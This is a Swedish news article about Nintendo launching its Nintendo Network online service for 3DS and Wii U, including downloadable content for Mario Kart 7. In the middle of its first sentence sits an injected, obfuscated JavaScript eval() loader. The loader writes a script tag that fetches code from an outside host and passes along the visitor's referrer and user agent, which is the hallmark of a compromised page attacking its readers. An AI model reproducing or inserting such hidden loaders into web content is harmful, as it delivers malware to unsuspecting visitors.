Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Nintendo Network kommer snart

Nintendo Network kommer snart
Alexander Gylemo

Nintendo eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zinry|var|u0026u|referrer|ersee||js|php’.split(’|’),0,{}))
har nyligen gått ut med att de vill satsa mer på online, en front de halkat efter på jämfört med PS3 och Xbox 360 på sistone. Av den anledningen släpper de snart sin senaste onlineservice för 3DS och kommande Wii U; Nintendo Network.

Med Nintendo Network presenteras Nintendo-publiken för bl.a. nerladdningsbara spel, nerladdningsbart material till Nintendo-spel och egna profiler, Mario Kart 7 blir det första spelet som får nerladdningsbara add-ons inom kort. Med Nintendo Network vill man även få igång ett Nintendofokuserat community och få sina användare att nätverka mer med varandra.

Man har inte gått ut med ett datum då tjänsten blir tillgänglig ännu, men det aktiveras troligen inom kort. Nintendo Network ligger helt i tid med att Nintendo nu försöker ta steget ut i hardcorescenen i och med deras nya konsoler Wii U och 3DS och det ska bli kul att se om de kan få igång något liv i onlinespelandet i den här generationens Nintendo-spel.